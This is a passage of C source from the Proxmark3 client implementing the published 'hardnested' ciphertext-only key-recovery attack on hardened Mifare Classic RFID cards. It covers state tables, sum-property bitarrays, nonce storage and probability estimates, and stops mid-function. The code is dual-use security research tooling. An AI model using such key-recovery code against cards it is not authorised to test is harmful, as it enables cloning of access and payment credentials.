//-----------------------------------------------------------------------------
// Copyright (C) 2015, 2016 by piwi
// fiddled with 2016 Azcid (hardnested bitsliced Bruteforce imp)
// fiddled with 2016 Matrix ( sub testing of nonces while collecting )
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
// at your option, any later version. See the LICENSE.txt file for the text of
// the license.
//-----------------------------------------------------------------------------
// Implements a card only attack based on crypto text (encrypted nonces
// received during a nested authentication) only. Unlike other card only
// attacks this doesn't rely on implementation errors but only on the
// inherent weaknesses of the crypto1 cypher. Described in
// Carlo Meijer, Roel Verdult, "Ciphertext-only Cryptanalysis on Hardened
// Mifare Classic Cards" in Proceedings of the 22nd ACM SIGSAC Conference on
// Computer and Communications Security, 2015
//-----------------------------------------------------------------------------
#include "cmdhfmfhard.h"
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
#include <string.h>
#include <time.h>
#include <pthread.h>
#include <locale.h>
#include <math.h>
#include "proxmark3.h"
#include "cmdmain.h"
#include "ui.h"
#include "util.h"
#include "util_posix.h"
#include "crapto1/crapto1.h"
#include "parity.h"
#include "hardnested/hardnested_bruteforce.h"
#include "hardnested/hardnested_bitarray_core.h"
#include "zlib.h"
#define NUM_CHECK_BITFLIPS_THREADS (num_CPUs())
#define NUM_REDUCTION_WORKING_THREADS (num_CPUs())
#define IGNORE_BITFLIP_THRESHOLD 0.99 // ignore bitflip arrays which have nearly only valid states
#define STATE_FILES_DIRECTORY "hardnested/tables/"
#define STATE_FILE_TEMPLATE "bitflip_%d_%03" PRIx16 "_states.bin.z"
#define DEBUG_KEY_ELIMINATION
// #define DEBUG_REDUCTION
static uint16_t sums[NUM_SUMS] = {0, 32, 56, 64, 80, 96, 104, 112, 120, 128, 136, 144, 152, 160, 176, 192, 200, 224, 256}; // possible sum property values
#define NUM_PART_SUMS 9 // number of possible partial sum property values
typedef enum {
EVEN_STATE = 0,
ODD_STATE = 1
} odd_even_t;
static uint32_t num_acquired_nonces = 0;
static uint64_t start_time = 0;
static uint16_t effective_bitflip[2][0x400];
static uint16_t num_effective_bitflips[2] = {0, 0};
static uint16_t all_effective_bitflip[0x400];
static uint16_t num_all_effective_bitflips = 0;
static uint16_t num_1st_byte_effective_bitflips = 0;
#define CHECK_1ST_BYTES 0x01
#define CHECK_2ND_BYTES 0x02
static uint8_t hardnested_stage = CHECK_1ST_BYTES;
static uint64_t known_target_key;
static uint32_t test_state[2] = {0,0};
static float brute_force_per_second;
static void get_SIMD_instruction_set(char* instruction_set) {
#if defined (__i386__) || defined (__x86_64__)
#if !defined(__APPLE__) || (defined(__APPLE__) && (__clang_major__ > 8 || __clang_major__ == 8 && __clang_minor__ >= 1))
#if (__GNUC__ >= 5) && (__GNUC__ > 5 || __GNUC_MINOR__ > 2)
if (__builtin_cpu_supports("avx512f")) strcpy(instruction_set, "AVX512F");
else if (__builtin_cpu_supports("avx2")) strcpy(instruction_set, "AVX2");
#else
if (__builtin_cpu_supports("avx2")) strcpy(instruction_set, "AVX2");
#endif
else if (__builtin_cpu_supports("avx")) strcpy(instruction_set, "AVX");
else if (__builtin_cpu_supports("sse2")) strcpy(instruction_set, "SSE2");
else if (__builtin_cpu_supports("mmx")) strcpy(instruction_set, "MMX");
else
#endif
#endif
strcpy(instruction_set, "no");
}
static void print_progress_header(void) {
char progress_text[80];
char instr_set[12] = "";
get_SIMD_instruction_set(instr_set);
sprintf(progress_text, "Start using %d threads and %s SIMD core", num_CPUs(), instr_set);
PrintAndLog("\n\n");
PrintAndLog(" time | #nonces | Activity | expected to brute force");
PrintAndLog(" | | | #states | time ");
PrintAndLog("------------------------------------------------------------------------------------------------------");
PrintAndLog(" 0 | 0 | %-55s | |", progress_text);
}
void hardnested_print_progress(uint32_t nonces, char *activity, float brute_force, uint64_t min_diff_print_time) {
static uint64_t last_print_time = 0;
if (msclock() - last_print_time > min_diff_print_time) {
last_print_time = msclock();
uint64_t total_time = msclock() - start_time;
float brute_force_time = brute_force / brute_force_per_second;
char brute_force_time_string[20];
if (brute_force_time < 90) {
sprintf(brute_force_time_string, "%2.0fs", brute_force_time);
} else if (brute_force_time < 60 * 90) {
sprintf(brute_force_time_string, "%2.0fmin", brute_force_time/60);
} else if (brute_force_time < 60 * 60 * 36) {
sprintf(brute_force_time_string, "%2.0fh", brute_force_time/(60*60));
} else {
sprintf(brute_force_time_string, "%2.0fd", brute_force_time/(60*60*24));
}
PrintAndLog(" %7.0f | %7u | %-55s | %15.0f | %5s", (float)total_time/1000.0, nonces, activity, brute_force, brute_force_time_string);
}
}
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// bitarray functions
static inline void clear_bitarray24(uint32_t *bitarray)
{
memset(bitarray, 0x00, sizeof(uint32_t) * (1<<19));
}
static inline void set_bitarray24(uint32_t *bitarray)
{
memset(bitarray, 0xff, sizeof(uint32_t) * (1<<19));
}
static inline void set_bit24(uint32_t *bitarray, uint32_t index)
{
bitarray[index>>5] |= 0x80000000>>(index&0x0000001f);
}
static inline void clear_bit24(uint32_t *bitarray, uint32_t index)
{
bitarray[index>>5] &= ~(0x80000000>>(index&0x0000001f));
}
static inline uint32_t test_bit24(uint32_t *bitarray, uint32_t index)
{
return bitarray[index>>5] & (0x80000000>>(index&0x0000001f));
}
static inline uint32_t next_state(uint32_t *bitarray, uint32_t state)
{
if (++state == 1<<24) return 1<<24;
uint32_t index = state >> 5;
uint_fast8_t bit = state & 0x1f;
uint32_t line = bitarray[index] << bit;
while (bit <= 0x1f) {
if (line & 0x80000000) return state;
state++;
bit++;
line <<= 1;
}
index++;
while (bitarray[index] == 0x00000000 && state < 1<<24) {
index++;
state += 0x20;
}
if (state >= 1<<24) return 1<<24;
#if defined __GNUC__
return state + __builtin_clz(bitarray[index]);
#else
bit = 0x00;
line = bitarray[index];
while (bit <= 0x1f) {
if (line & 0x80000000) return state;
state++;
bit++;
line <<= 1;
}
return 1<<24;
#endif
}
static inline uint32_t next_not_state(uint32_t *bitarray, uint32_t state)
{
if (++state == 1<<24) return 1<<24;
uint32_t index = state >> 5;
uint_fast8_t bit = state & 0x1f;
uint32_t line = bitarray[index] << bit;
while (bit <= 0x1f) {
if ((line & 0x80000000) == 0) return state;
state++;
bit++;
line <<= 1;
}
index++;
while (bitarray[index] == 0xffffffff && state < 1<<24) {
index++;
state += 0x20;
}
if (state >= 1<<24) return 1<<24;
#if defined __GNUC__
return state + __builtin_clz(~bitarray[index]);
#else
bit = 0x00;
line = bitarray[index];
while (bit <= 0x1f) {
if ((line & 0x80000000) == 0) return state;
state++;
bit++;
line <<= 1;
}
return 1<<24;
#endif
}
#define BITFLIP_2ND_BYTE 0x0200
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// bitflip property bitarrays
static uint32_t *bitflip_bitarrays[2][0x400];
static uint32_t count_bitflip_bitarrays[2][0x400];
static int compare_count_bitflip_bitarrays(const void *b1, const void *b2)
{
uint64_t count1 = (uint64_t)count_bitflip_bitarrays[ODD_STATE][*(uint16_t *)b1] * count_bitflip_bitarrays[EVEN_STATE][*(uint16_t *)b1];
uint64_t count2 = (uint64_t)count_bitflip_bitarrays[ODD_STATE][*(uint16_t *)b2] * count_bitflip_bitarrays[EVEN_STATE][*(uint16_t *)b2];
return (count1 > count2) - (count2 > count1);
}
static voidpf inflate_malloc(voidpf opaque, uInt items, uInt size)
{
return malloc(items*size);
}
static void inflate_free(voidpf opaque, voidpf address)
{
free(address);
}
#define OUTPUT_BUFFER_LEN 80
#define INPUT_BUFFER_LEN 80
//----------------------------------------------------------------------------
// Initialize decompression of the respective (HF or LF) FPGA stream
//----------------------------------------------------------------------------
static void init_inflate(z_streamp compressed_stream, uint8_t *input_buffer, uint32_t insize, uint8_t *output_buffer, uint32_t outsize)
{
// initialize z_stream structure for inflate:
compressed_stream->next_in = input_buffer;
compressed_stream->avail_in = insize;
compressed_stream->next_out = output_buffer;
compressed_stream->avail_out = outsize;
compressed_stream->zalloc = &inflate_malloc;
compressed_stream->zfree = &inflate_free;
inflateInit2(compressed_stream, 0);
}
static void init_bitflip_bitarrays(void)
{
#if defined (DEBUG_REDUCTION)
uint8_t line = 0;
#endif
z_stream compressed_stream;
char state_files_path[strlen(get_my_executable_directory()) + strlen(STATE_FILES_DIRECTORY) + strlen(STATE_FILE_TEMPLATE) + 1];
char state_file_name[strlen(STATE_FILE_TEMPLATE)+1];
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
num_effective_bitflips[odd_even] = 0;
for (uint16_t bitflip = 0x001; bitflip < 0x400; bitflip++) {
bitflip_bitarrays[odd_even][bitflip] = NULL;
count_bitflip_bitarrays[odd_even][bitflip] = 1<<24;
sprintf(state_file_name, STATE_FILE_TEMPLATE, odd_even, bitflip);
strcpy(state_files_path, get_my_executable_directory());
strcat(state_files_path, STATE_FILES_DIRECTORY);
strcat(state_files_path, state_file_name);
FILE *statesfile = fopen(state_files_path, "rb");
if (statesfile == NULL) {
continue;
} else {
fseek(statesfile, 0, SEEK_END);
uint32_t filesize = (uint32_t)ftell(statesfile);
rewind(statesfile);
uint8_t input_buffer[filesize];
size_t bytesread = fread(input_buffer, 1, filesize, statesfile);
if (bytesread != filesize) {
printf("File read error with %s. Aborting...\n", state_file_name);
fclose(statesfile);
inflateEnd(&compressed_stream);
exit(5);
}
fclose(statesfile);
uint32_t count = 0;
init_inflate(&compressed_stream, input_buffer, filesize, (uint8_t *)&count, sizeof(count));
inflate(&compressed_stream, Z_SYNC_FLUSH);
if ((float)count/(1<<24) < IGNORE_BITFLIP_THRESHOLD) {
uint32_t *bitset = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (bitset == NULL) {
printf("Out of memory error in init_bitflip_statelists(). Aborting...\n");
inflateEnd(&compressed_stream);
exit(4);
}
compressed_stream.next_out = (uint8_t *)bitset;
compressed_stream.avail_out = sizeof(uint32_t) * (1<<19);
inflate(&compressed_stream, Z_SYNC_FLUSH);
effective_bitflip[odd_even][num_effective_bitflips[odd_even]++] = bitflip;
bitflip_bitarrays[odd_even][bitflip] = bitset;
count_bitflip_bitarrays[odd_even][bitflip] = count;
#if defined (DEBUG_REDUCTION)
printf("(%03" PRIx16 " %s:%5.1f%%) ", bitflip, odd_even?"odd ":"even", (float)count/(1<<24)*100.0);
line++;
if (line == 8) {
printf("\n");
line = 0;
}
#endif
}
inflateEnd(&compressed_stream);
}
}
effective_bitflip[odd_even][num_effective_bitflips[odd_even]] = 0x400; // EndOfList marker
}
uint16_t i = 0;
uint16_t j = 0;
num_all_effective_bitflips = 0;
num_1st_byte_effective_bitflips = 0;
while (i < num_effective_bitflips[EVEN_STATE] || j < num_effective_bitflips[ODD_STATE]) {
if (effective_bitflip[EVEN_STATE][i] < effective_bitflip[ODD_STATE][j]) {
all_effective_bitflip[num_all_effective_bitflips++] = effective_bitflip[EVEN_STATE][i];
i++;
} else if (effective_bitflip[EVEN_STATE][i] > effective_bitflip[ODD_STATE][j]) {
all_effective_bitflip[num_all_effective_bitflips++] = effective_bitflip[ODD_STATE][j];
j++;
} else {
all_effective_bitflip[num_all_effective_bitflips++] = effective_bitflip[EVEN_STATE][i];
i++; j++;
}
if (!(all_effective_bitflip[num_all_effective_bitflips-1] & BITFLIP_2ND_BYTE)) {
num_1st_byte_effective_bitflips = num_all_effective_bitflips;
}
}
qsort(all_effective_bitflip, num_1st_byte_effective_bitflips, sizeof(uint16_t), compare_count_bitflip_bitarrays);
#if defined (DEBUG_REDUCTION)
printf("\n1st byte effective bitflips (%d): \n", num_1st_byte_effective_bitflips);
for(uint16_t i = 0; i < num_1st_byte_effective_bitflips; i++) {
printf("%03x ", all_effective_bitflip[i]);
}
#endif
qsort(all_effective_bitflip+num_1st_byte_effective_bitflips, num_all_effective_bitflips - num_1st_byte_effective_bitflips, sizeof(uint16_t), compare_count_bitflip_bitarrays);
#if defined (DEBUG_REDUCTION)
printf("\n2nd byte effective bitflips (%d): \n", num_all_effective_bitflips - num_1st_byte_effective_bitflips);
for(uint16_t i = num_1st_byte_effective_bitflips; i < num_all_effective_bitflips; i++) {
printf("%03x ", all_effective_bitflip[i]);
}
#endif
char progress_text[80];
sprintf(progress_text, "Using %d precalculated bitflip state tables", num_all_effective_bitflips);
hardnested_print_progress(0, progress_text, (float)(1LL<<47), 0);
}
static void free_bitflip_bitarrays(void)
{
for (int16_t bitflip = 0x3ff; bitflip > 0x000; bitflip--) {
free_bitarray(bitflip_bitarrays[ODD_STATE][bitflip]);
}
for (int16_t bitflip = 0x3ff; bitflip > 0x000; bitflip--) {
free_bitarray(bitflip_bitarrays[EVEN_STATE][bitflip]);
}
}
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// sum property bitarrays
static uint32_t *part_sum_a0_bitarrays[2][NUM_PART_SUMS];
static uint32_t *part_sum_a8_bitarrays[2][NUM_PART_SUMS];
static uint32_t *sum_a0_bitarrays[2][NUM_SUMS];
static uint16_t PartialSumProperty(uint32_t state, odd_even_t odd_even)
{
uint16_t sum = 0;
for (uint16_t j = 0; j < 16; j++) {
uint32_t st = state;
uint16_t part_sum = 0;
if (odd_even == ODD_STATE) {
for (uint16_t i = 0; i < 5; i++) {
part_sum ^= filter(st);
st = (st << 1) | ((j >> (3-i)) & 0x01) ;
}
part_sum ^= 1; // XOR 1 cancelled out for the other 8 bits
} else {
for (uint16_t i = 0; i < 4; i++) {
st = (st << 1) | ((j >> (3-i)) & 0x01) ;
part_sum ^= filter(st);
}
}
sum += part_sum;
}
return sum;
}
static void init_part_sum_bitarrays(void)
{
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
for (uint16_t part_sum_a0 = 0; part_sum_a0 < NUM_PART_SUMS; part_sum_a0++) {
part_sum_a0_bitarrays[odd_even][part_sum_a0] = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (part_sum_a0_bitarrays[odd_even][part_sum_a0] == NULL) {
printf("Out of memory error in init_part_suma0_statelists(). Aborting...\n");
exit(4);
}
clear_bitarray24(part_sum_a0_bitarrays[odd_even][part_sum_a0]);
}
}
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
//printf("(%d, %" PRIu16 ")...", odd_even, part_sum_a0);
for (uint32_t state = 0; state < (1<<20); state++) {
uint16_t part_sum_a0 = PartialSumProperty(state, odd_even) / 2;
for (uint16_t low_bits = 0; low_bits < 1<<4; low_bits++) {
set_bit24(part_sum_a0_bitarrays[odd_even][part_sum_a0], state<<4 | low_bits);
}
}
}
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
for (uint16_t part_sum_a8 = 0; part_sum_a8 < NUM_PART_SUMS; part_sum_a8++) {
part_sum_a8_bitarrays[odd_even][part_sum_a8] = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (part_sum_a8_bitarrays[odd_even][part_sum_a8] == NULL) {
printf("Out of memory error in init_part_suma8_statelists(). Aborting...\n");
exit(4);
}
clear_bitarray24(part_sum_a8_bitarrays[odd_even][part_sum_a8]);
}
}
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
//printf("(%d, %" PRIu16 ")...", odd_even, part_sum_a8);
for (uint32_t state = 0; state < (1<<20); state++) {
uint16_t part_sum_a8 = PartialSumProperty(state, odd_even) / 2;
for (uint16_t high_bits = 0; high_bits < 1<<4; high_bits++) {
set_bit24(part_sum_a8_bitarrays[odd_even][part_sum_a8], state | high_bits<<20);
}
}
}
}
static void free_part_sum_bitarrays(void)
{
for (int16_t part_sum_a8 = (NUM_PART_SUMS-1); part_sum_a8 >= 0; part_sum_a8--) {
free_bitarray(part_sum_a8_bitarrays[ODD_STATE][part_sum_a8]);
}
for (int16_t part_sum_a8 = (NUM_PART_SUMS-1); part_sum_a8 >= 0; part_sum_a8--) {
free_bitarray(part_sum_a8_bitarrays[EVEN_STATE][part_sum_a8]);
}
for (int16_t part_sum_a0 = (NUM_PART_SUMS-1); part_sum_a0 >= 0; part_sum_a0--) {
free_bitarray(part_sum_a0_bitarrays[ODD_STATE][part_sum_a0]);
}
for (int16_t part_sum_a0 = (NUM_PART_SUMS-1); part_sum_a0 >= 0; part_sum_a0--) {
free_bitarray(part_sum_a0_bitarrays[EVEN_STATE][part_sum_a0]);
}
}
static void init_sum_bitarrays(void)
{
for (uint16_t sum_a0 = 0; sum_a0 < NUM_SUMS; sum_a0++) {
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
sum_a0_bitarrays[odd_even][sum_a0] = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (sum_a0_bitarrays[odd_even][sum_a0] == NULL) {
printf("Out of memory error in init_sum_bitarrays(). Aborting...\n");
exit(4);
}
clear_bitarray24(sum_a0_bitarrays[odd_even][sum_a0]);
}
}
for (uint8_t p = 0; p < NUM_PART_SUMS; p++) {
for (uint8_t q = 0; q < NUM_PART_SUMS; q++) {
uint16_t sum_a0 = 2*p*(16-2*q) + (16-2*p)*2*q;
uint16_t sum_a0_idx = 0;
while (sums[sum_a0_idx] != sum_a0) sum_a0_idx++;
bitarray_OR(sum_a0_bitarrays[EVEN_STATE][sum_a0_idx], part_sum_a0_bitarrays[EVEN_STATE][q]);
bitarray_OR(sum_a0_bitarrays[ODD_STATE][sum_a0_idx], part_sum_a0_bitarrays[ODD_STATE][p]);
}
}
}
static void free_sum_bitarrays(void)
{
for (int8_t sum_a0 = NUM_SUMS-1; sum_a0 >= 0; sum_a0--) {
free_bitarray(sum_a0_bitarrays[ODD_STATE][sum_a0]);
free_bitarray(sum_a0_bitarrays[EVEN_STATE][sum_a0]);
}
}
#ifdef DEBUG_KEY_ELIMINATION
char failstr[250] = "";
#endif
static const float p_K0[NUM_SUMS] = { // the probability that a random nonce has a Sum Property K
0.0290, 0.0083, 0.0006, 0.0339, 0.0048, 0.0934, 0.0119, 0.0489, 0.0602, 0.4180, 0.0602, 0.0489, 0.0119, 0.0934, 0.0048, 0.0339, 0.0006, 0.0083, 0.0290
};
static float my_p_K[NUM_SUMS];
static const float *p_K;
static uint32_t cuid;
static noncelist_t nonces[256];
static uint8_t best_first_bytes[256];
static uint64_t maximum_states = 0;
static uint8_t best_first_byte_smallest_bitarray = 0;
static uint16_t first_byte_Sum = 0;
static uint16_t first_byte_num = 0;
static bool write_stats = false;
static FILE *fstats = NULL;
static uint32_t *all_bitflips_bitarray[2];
static uint32_t num_all_bitflips_bitarray[2];
static bool all_bitflips_bitarray_dirty[2];
static uint64_t last_sample_clock = 0;
static uint64_t sample_period = 0;
static uint64_t num_keys_tested = 0;
static statelist_t *candidates = NULL;
static int add_nonce(uint32_t nonce_enc, uint8_t par_enc)
{
uint8_t first_byte = nonce_enc >> 24;
noncelistentry_t *p1 = nonces[first_byte].first;
noncelistentry_t *p2 = NULL;
if (p1 == NULL) { // first nonce with this 1st byte
first_byte_num++;
first_byte_Sum += evenparity32((nonce_enc & 0xff000000) | (par_enc & 0x08));
}
while (p1 != NULL && (p1->nonce_enc & 0x00ff0000) < (nonce_enc & 0x00ff0000)) {
p2 = p1;
p1 = p1->next;
}
if (p1 == NULL) { // need to add at the end of the list
if (p2 == NULL) { // list is empty yet. Add first entry.
p2 = nonces[first_byte].first = malloc(sizeof(noncelistentry_t));
} else { // add new entry at end of existing list.
p2 = p2->next = malloc(sizeof(noncelistentry_t));
}
} else if ((p1->nonce_enc & 0x00ff0000) != (nonce_enc & 0x00ff0000)) { // found distinct 2nd byte. Need to insert.
if (p2 == NULL) { // need to insert at start of list
p2 = nonces[first_byte].first = malloc(sizeof(noncelistentry_t));
} else {
p2 = p2->next = malloc(sizeof(noncelistentry_t));
}
} else { // we have seen this 2nd byte before. Nothing to add or insert.
return (0);
}
// add or insert new data
p2->next = p1;
p2->nonce_enc = nonce_enc;
p2->par_enc = par_enc;
nonces[first_byte].num++;
nonces[first_byte].Sum += evenparity32((nonce_enc & 0x00ff0000) | (par_enc & 0x04));
nonces[first_byte].sum_a8_guess_dirty = true; // indicates that we need to recalculate the Sum(a8) probability for this first byte
return (1); // new nonce added
}
static void init_nonce_memory(void)
{
for (uint16_t i = 0; i < 256; i++) {
nonces[i].num = 0;
nonces[i].Sum = 0;
nonces[i].first = NULL;
for (uint16_t j = 0; j < NUM_SUMS; j++) {
nonces[i].sum_a8_guess[j].sum_a8_idx = j;
nonces[i].sum_a8_guess[j].prob = 0.0;
}
nonces[i].sum_a8_guess_dirty = false;
for (uint16_t bitflip = 0x000; bitflip < 0x400; bitflip++) {
nonces[i].BitFlips[bitflip] = 0;
}
nonces[i].states_bitarray[EVEN_STATE] = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (nonces[i].states_bitarray[EVEN_STATE] == NULL) {
printf("Out of memory error in init_nonce_memory(). Aborting...\n");
exit(4);
}
set_bitarray24(nonces[i].states_bitarray[EVEN_STATE]);
nonces[i].num_states_bitarray[EVEN_STATE] = 1 << 24;
nonces[i].states_bitarray[ODD_STATE] = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (nonces[i].states_bitarray[ODD_STATE] == NULL) {
printf("Out of memory error in init_nonce_memory(). Aborting...\n");
exit(4);
}
set_bitarray24(nonces[i].states_bitarray[ODD_STATE]);
nonces[i].num_states_bitarray[ODD_STATE] = 1 << 24;
nonces[i].all_bitflips_dirty[EVEN_STATE] = false;
nonces[i].all_bitflips_dirty[ODD_STATE] = false;
}
first_byte_num = 0;
first_byte_Sum = 0;
}
static void free_nonce_list(noncelistentry_t *p)
{
if (p == NULL) {
return;
} else {
free_nonce_list(p->next);
free(p);
}
}
static void free_nonces_memory(void)
{
for (uint16_t i = 0; i < 256; i++) {
free_nonce_list(nonces[i].first);
}
for (int i = 255; i >= 0; i--) {
free_bitarray(nonces[i].states_bitarray[ODD_STATE]);
free_bitarray(nonces[i].states_bitarray[EVEN_STATE]);
}
}
static double p_hypergeometric(uint16_t i_K, uint16_t n, uint16_t k)
{
// for efficient computation we are using the recursive definition
// (K-k+1) * (n-k+1)
// P(X=k) = P(X=k-1) * --------------------
// k * (N-K-n+k)
// and
// (N-K)*(N-K-1)*...*(N-K-n+1)
// P(X=0) = -----------------------------
// N*(N-1)*...*(N-n+1)
uint16_t const N = 256;
uint16_t K = sums[i_K];
if (n-k > N-K || k > K) return 0.0; // avoids log(x<=0) in calculation below
if (k == 0) {
// use logarithms to avoid overflow with huge factorials (double type can only hold 170!)
double log_result = 0.0;
for (int16_t i = N-K; i >= N-K-n+1; i--) {
log_result += log(i);
}
for (int16_t i = N; i >= N-n+1; i--) {
log_result -= log(i);
}
return exp(log_result);
} else {
if (n-k == N-K) { // special case. The published recursion below would fail with a divide by zero exception
double log_result = 0.0;
for (int16_t i = k+1; i <= n; i++) {
log_result += log(i);
}
for (int16_t i = K+1; i <= N; i++) {
log_result -= log(i);
}
return exp(log_result);
} else { // recursion
return (p_hypergeometric(i_K, n, k-1) * (K-k+1) * (n-k+1) / (k * (N-K-n+k)));
}
}
}
static float sum_probability(uint16_t i_K, uint16_t n, uint16_t k)
{
if (k > sums[i_K]) return 0.0;
double p_T_is_k_when_S_is_K = p_hypergeometric(i_K, n, k);
double p_S_is_K = p_K[i_K];
double p_T_is_k = 0;
for (uint16_t i = 0; i < NUM_SUMS; i++) {
p_T_is_k += p_K[i] * p_hypergeometric(i, n, k);
}
return(p_T_is_k_when_S_is_K * p_S_is_K / p_T_is_k);
}
static uint32_t part_sum_count[2][NUM_PART_SUMS][NUM_PART_SUMS];
static void init_allbitflips_array(void)
{
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
uint32_t *bitset = all_bitflips_bitarray[odd_even] = (uint32_t *)malloc_bitarray(sizeof(uint32_t) * (1<<19));
if (bitset == NULL) {
printf("Out of memory in init_allbitflips_array(). Aborting...");
exit(4);
}
set_bitarray24(bitset);
all_bitflips_bitarray_dirty[odd_even] = false;
num_all_bitflips_bitarray[odd_even] = 1<<24;
}
}
static void update_allbitflips_array(void)
{
if (hardnested_stage & CHECK_2ND_BYTES) {
for (uint16_t i = 0; i < 256; i++) {
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
if (nonces[i].all_bitflips_dirty[odd_even]) {
uint32_t old_count = num_all_bitflips_bitarray[odd_even];
num_all_bitflips_bitarray[odd_even] = count_bitarray_low20_AND(all_bitflips_bitarray[odd_even], nonces[i].states_bitarray[odd_even]);
nonces[i].all_bitflips_dirty[odd_even] = false;
if (num_all_bitflips_bitarray[odd_even] != old_count) {
all_bitflips_bitarray_dirty[odd_even] = true;
}
}
}
}
}
}
static uint32_t estimated_num_states_part_sum_coarse(uint16_t part_sum_a0_idx, uint16_t part_sum_a8_idx, odd_even_t odd_even)
{
return part_sum_count[odd_even][part_sum_a0_idx][part_sum_a8_idx];
}
static uint32_t estimated_num_states_part_sum(uint8_t first_byte, uint16_t part_sum_a0_idx, uint16_t part_sum_a8_idx, odd_even_t odd_even)
{
if (odd_even == ODD_STATE) {
return count_bitarray_AND3(part_sum_a0_bitarrays[odd_even][part_sum_a0_idx],
part_sum_a8_bitarrays[odd_even][part_sum_a8_idx],
nonces[first_byte].states_bitarray[odd_even]);
} else {
return count_bitarray_AND4(part_sum_a0_bitarrays[odd_even][part_sum_a0_idx],
part_sum_a8_bitarrays[odd_even][part_sum_a8_idx],
nonces[first_byte].states_bitarray[odd_even],
nonces[first_byte^0x80].states_bitarray[odd_even]);
}
// estimate reduction by all_bitflips_match()
// if (odd_even) {
// float p_bitflip = (float)nonces[first_byte ^ 0x80].num_states_bitarray[ODD_STATE] / num_all_bitflips_bitarray[ODD_STATE];
// return (float)count * p_bitflip; //(p_bitflip - 0.25*p_bitflip*p_bitflip);
// } else {
// return count;
// }
}
static uint64_t estimated_num_states(uint8_t first_byte, uint16_t sum_a0, uint16_t sum_a8)
{
uint64_t num_states = 0;
for (uint8_t p = 0; p < NUM_PART_SUMS; p++) {
for (uint8_t q = 0; q < NUM_PART_SUMS; q++) {
if (2*p*(16-2*q) + (16-2*p)*2*q == sum_a0) {
for (uint8_t r = 0; r < NUM_PART_SUMS; r++) {
for (uint8_t s = 0; s < NUM_PART_SUMS; s++) {
if (2*r*(16-2*s) + (16-2*r)*2*s == sum_a8) {
num_states += (uint64_t)estimated_num_states_part_sum(first_byte, p, r, ODD_STATE)
* estimated_num_states_part_sum(first_byte, q, s, EVEN_STATE);
}
}
}
}
}
}
return num_states;
}
static uint64_t estimated_num_states_coarse(uint16_t sum_a0, uint16_t sum_a8)
{
uint64_t num_states = 0;
for (uint8_t p = 0; p < NUM_PART_SUMS; p++) {
for (uint8_t q = 0; q < NUM_PART_SUMS; q++) {
if (2*p*(16-2*q) + (16-2*p)*2*q == sum_a0) {
for (uint8_t r = 0; r < NUM_PART_SUMS; r++) {
for (uint8_t s = 0; s < NUM_PART_SUMS; s++) {
if (2*r*(16-2*s) + (16-2*r)*2*s == sum_a8) {
num_states += (uint64_t)estimated_num_states_part_sum_coarse(p, r, ODD_STATE)
* estimated_num_states_part_sum_coarse(q, s, EVEN_STATE);
}
}
}
}
}
}
return num_states;
}
static void update_p_K(void)
{
if (hardnested_stage & CHECK_2ND_BYTES) {
uint64_t total_count = 0;
uint16_t sum_a0 = sums[first_byte_Sum];
for (uint8_t sum_a8_idx = 0; sum_a8_idx < NUM_SUMS; sum_a8_idx++) {
uint16_t sum_a8 = sums[sum_a8_idx];
total_count += estimated_num_states_coarse(sum_a0, sum_a8);
}
for (uint8_t sum_a8_idx = 0; sum_a8_idx < NUM_SUMS; sum_a8_idx++) {
uint16_t sum_a8 = sums[sum_a8_idx];
my_p_K[sum_a8_idx] = (float)estimated_num_states_coarse(sum_a0, sum_a8) / total_count;
}
// printf("my_p_K = [");
// for (uint8_t sum_a8_idx = 0; sum_a8_idx < NUM_SUMS; sum_a8_idx++) {
// printf("%7.4f ", my_p_K[sum_a8_idx]);
// }
p_K = my_p_K;
}
}
static void update_sum_bitarrays(odd_even_t odd_even)
{
if (all_bitflips_bitarray_dirty[odd_even]) {
for (uint8_t part_sum = 0; part_sum < NUM_PART_SUMS; part_sum++) {
bitarray_AND(part_sum_a0_bitarrays[odd_even][part_sum], all_bitflips_bitarray[odd_even]);
bitarray_AND(part_sum_a8_bitarrays[odd_even][part_sum], all_bitflips_bitarray[odd_even]);
}
for (uint16_t i = 0; i < 256; i++) {
nonces[i].num_states_bitarray[odd_even] = count_bitarray_AND(nonces[i].states_bitarray[odd_even], all_bitflips_bitarray[odd_even]);
}
for (uint8_t part_sum_a0 = 0; part_sum_a0 < NUM_PART_SUMS; part_sum_a0++) {
for (uint8_t part_sum_a8 = 0; part_sum_a8 < NUM_PART_SUMS; part_sum_a8++) {
part_sum_count[odd_even][part_sum_a0][part_sum_a8]
+= count_bitarray_AND2(part_sum_a0_bitarrays[odd_even][part_sum_a0], part_sum_a8_bitarrays[odd_even][part_sum_a8]);
}
}
all_bitflips_bitarray_dirty[odd_even] = false;
}
}
static int compare_expected_num_brute_force(const void *b1, const void *b2)
{
uint8_t index1 = *(uint8_t *)b1;
uint8_t index2 = *(uint8_t *)b2;
float score1 = nonces[index1].expected_num_brute_force;
float score2 = nonces[index2].expected_num_brute_force;
return (score1 > score2) - (score1 < score2);
}
static int compare_sum_a8_guess(const void *b1, const void *b2)
{
float prob1 = ((guess_sum_a8_t *)b1)->prob;
float prob2 = ((guess_sum_a8_t *)b2)->prob;
return (prob1 < prob2) - (prob1 > prob2);
}
static float check_smallest_bitflip_bitarrays(void)
{
uint32_t num_odd, num_even;
uint64_t smallest = 1LL << 48;
